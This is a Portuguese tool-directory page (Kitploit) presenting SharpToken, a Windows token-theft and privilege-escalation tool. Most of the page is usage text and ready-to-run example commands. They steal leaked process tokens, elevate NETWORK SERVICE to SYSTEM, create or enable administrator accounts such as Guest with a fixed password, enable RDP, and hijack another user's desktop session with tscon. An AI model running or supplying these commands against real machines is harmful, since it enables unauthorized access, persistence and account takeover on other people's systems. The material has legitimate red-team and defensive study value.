Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
SharpToken — Ferramenta de roubo de tokens e escalada de privilégios no Windows que rouba tokens vazados de processos, permite acesso em nível de SYSTEM, impersonação de usuários e troca de área de trabalho sem senhas. | Kitploit
Ferramentas/GitHubGitHub/beichendream/sharptoken
Escalada de PrivilégiosMovimento LateralPós-ExploraçãoRed Teaming
GitHubbeichendream/sharptoken

SharpToken

Ferramenta de roubo de tokens e escalada de privilégios no Windows que rouba tokens vazados de processos, permite acesso em nível de SYSTEM, impersonação de usuários e troca de área de trabalho sem senhas.

Ver Repositório
49668há 2 anosRevisado pelo Kitploit

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

SharpToken

Durante a movimentação lateral de Red Team, muitas vezes precisamos roubar as permissões de outros usuários. Sob a defesa de um EDR moderno, é difícil para nós usar o Mimikatz para obter permissões de outros usuários, e se o usuário alvo não tiver nenhum processo ativo, não temos como usar "OpenProcessToken" para roubar o Token.

SharpToken é uma ferramenta para explorar vazamentos de Token. Ela pode encontrar Tokens vazados de todos os processos do sistema e utilizá-los. Se você for um usuário de serviço com privilégios baixos, pode até usá-la para escalar para privilégios "NT AUTHORITY\SYSTEM", e pode alternar para a área de trabalho do usuário alvo para fazer mais sem a senha do usuário alvo. ..

image

Uso

root@kitploit:~
SharpToken By BeichenDream
=========================================================

Github : https://github.com/BeichenDream/SharpToken

Se você é um usuário NT AUTHORITY\NETWORK SERVICE, então basta adicionar o parâmetro bypass para se tornar NT AUTHORITY\SYSTEM
exemplo:
SharpToken execute "NT AUTHORITY\SYSTEM" "cmd /c whoami" bypass


Uso:

SharpToken COMANDO argumentos



COMANDOS:

        list_token [pid do processo]        [bypass]

        list_all_token [pid do processo] [bypass]

        add_user    <nome de usuário> <senha> [grupo] [domínio] [bypass]

        enableUser <nome de usuário> <NovaSenha> [NovoGrupo] [bypass]

        delete_user <nome de usuário> [domínio] [bypass]

        execute <tokenUser> <linha de comando> [Interativo] [bypass]

        enableRDP [bypass]

        tscon <id da sessão alvo> [id da sessão fonte] [bypass]


exemplo:
    SharpToken list_token
    SharpToken list_token bypass
    SharpToken list_token 6543
    SharpToken add_user admin Abcd1234! Administrators
    SharpToken enableUser Guest Abcd1234! Administrators
    SharpToken delete_user admin
    SharpToken execute "NT AUTHORITY\SYSTEM" "cmd /c whoami"
    SharpToken execute "NT AUTHORITY\SYSTEM" "cmd /c whoami" bypass
    SharpToken execute "NT AUTHORITY\SYSTEM" cmd true
    SharpToken execute "NT AUTHORITY\SYSTEM" cmd true bypass
    SharpToken tscon 1




Permissões Elevadas

Além do roubo de Token e aumento de privilégio usual, o SharpToken também suporta obter Tokens com integridade através de Bypass

Se você é um usuário NT AUTHORITY/NETWORK SERVICE e adiciona o parâmetro bypass, o SharpToken roubará o System do RPCSS, ou seja, NT AUTHORITY\NETWORK SERVICE para NT AUTHORITY\SYSTEM incondicionalmente

image

ListToken

As informações enumeradas incluem SID, LogonDomain, UserName, Session, LogonType, TokenType, TokenHandle (handle do Token após Duplicação), TargetProcessId (processo de origem do Token), TargetProcessToken (handle do Token no processo de origem), Groups (grupo ao qual o usuário do Token pertence)

root@kitploit:~
SharpToken list_token

image

Enumerar Tokens do processo especificado

root@kitploit:~
SharpToken list_token 468

image

Obter um shell interativo

root@kitploit:~
execute "NT AUTHORITY\SYSTEM" cmd true

image

Obter resultados de execução de comando (executado sob webshell)

root@kitploit:~
SharpToken execute "NT AUTHORITY\SYSTEM" "cmd /c whoami"

image

Criar um usuário administrador com o token roubado

root@kitploit:~

SharpToken add_user admin Abcd1234! Administrators

Ativar um usuário administrador com o token roubado

root@kitploit:~
    SharpToken enableUser Guest Abcd1234! Administrators

Deletar um usuário com um Token roubado

root@kitploit:~
    SharpToken delete_user admin

Usar o Token roubado para alternar para a área de trabalho do alvo

Onde 1 é a área de trabalho do usuário alvo e 2 é a área de trabalho que queremos receber

root@kitploit:~
    SharpToken tscon 1 2

LICENÇA

GNU General Public License

Referência

https://www.tiraniddo.dev/2020/04/sharing-logon-session-little-too-much.html

https://github.com/decoder-it/NetworkServiceExploit

https://github.com/FSecureLABS/incognito

https://github.com/chroblert/JCTokenUtil

Baixar ferramenta